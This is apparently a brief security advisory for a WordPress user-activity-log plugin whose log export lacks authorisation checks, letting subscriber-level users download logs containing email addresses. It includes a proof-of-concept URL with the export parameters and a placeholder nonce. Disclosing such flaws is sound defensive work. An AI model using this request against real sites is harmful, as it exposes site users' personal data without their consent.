Description The plugin lacks proper authorisation when exporting its activity logs, allowing any authenticated users, such as subscriber to perform such action and retrieve PII such as email addresses.
As a subscriber, open the following URL https://example.com/wp-admin/admin-post.php?page=user_action_log&export;=user_logs&logformat;=csv&userrole;&dateshow;&username;&type;&showip;&txtsearch;&export-nonce;=aaa